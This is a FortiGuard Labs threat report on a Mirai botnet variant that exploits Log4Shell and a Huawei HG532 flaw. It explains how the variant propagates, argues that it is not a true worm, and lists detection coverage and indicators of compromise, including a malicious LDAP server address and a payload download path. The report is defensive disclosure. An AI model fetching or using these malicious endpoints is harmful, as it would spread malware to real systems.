virus logo Threat Signal Report

Mirai Malware that Allegedly Propagates Using Log4Shell Spotted in the Wild

Description

FortiGuard Labs is aware of a new Mirai Linux variant that spreads using CVE-2021-44228 (Log4Shell). This is possibly the first Mirai variant equipped with Log4Shell exploit code incorporated alongside a Mirai variant, since the vulnerability came to light on December 9th 2021.

This sample was discovered by security researcher @1ZRR4H on Twitter.

How does this Mirai Variant Work? Is this a Worm?
The Mirai variant exploits CVE-2021-44228 and CVE-2017-17215 (Huawei HG532 Remote Code Execution). If the exploit is successful, the targeted machine is redirected to a LDAP server to pass the next stage payload (varies) to the victim machine.

Furthermore, chatter on OSINT channels have discussed whether or not this is a "worm." Our findings reveal that like a worm, it has the capability to propagate. But what makes it not a worm in the traditional sense is that all instructions are under control of the botmaster and it relies on an external resource for propagation. The botmaster can also start/stop various actions, unlike a worm. In conclusion, our analysis concludes that this Mirai variant is equipped with Log4Shell exploit code and Huawei H532 exploit code and does not classify as a worm.

What is Mirai malware?
Mirai malware is a Linux IoT malware that makes infected machines join a zombie network that is used for Distributed Denial of Service (DDoS) attacks. The first report of Mirai goes back to at least August 2016. Since the source code of Mirai was leaked publicly, there have been numerous threat actors and campaigns incorporating Mirai and related variants in the wild.

FortiGuard Labs previously published several blogs on Mirai IoT malware. Please refer to the APPENDIX for links to related blogs.

Why is this Significant?
This sample was reported to be one of the first worm-like samples exploiting Log4Shell. However, our analysis has concluded that this specific sample does not qualify nor can it be classified as a worm.

What is the Status of Coverage?
FortiGuard Labs provide the following AV coverage against this Mirai malware variant:

ELF/Mirai.VI!tr

FortiGuard Labs provides the following IPS coverage against CVE-2017-17215:

Huawei.HG532.Remote.Code.Execution

For FortiEDR, all known samples have been added to our cloud intelligence and will be blocked if executed.

All network IOCs are blocked by the WebFiltering client.

Appendix

Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) (Fortinet)

MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability (Fortinet)

The Ghosts of Mirai (Fortinet)

Mirai-based Botnet - Moobot Targets Hikvision Vulnerability

CVE-2017-17215 (MITRE)


IOCs

e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273

179.43.175.101:1389

198.98.60.67/bins/x86


ID 83
Date Dec 20, 2021
Threat/
Vulnerability		 Multiple
FortiGate Device Triggered N/A
Threat Actor Type Unknown
Experienced a Breach? We're here to help FortiGuard Incident Response Services
FortiGuard Incident Response Services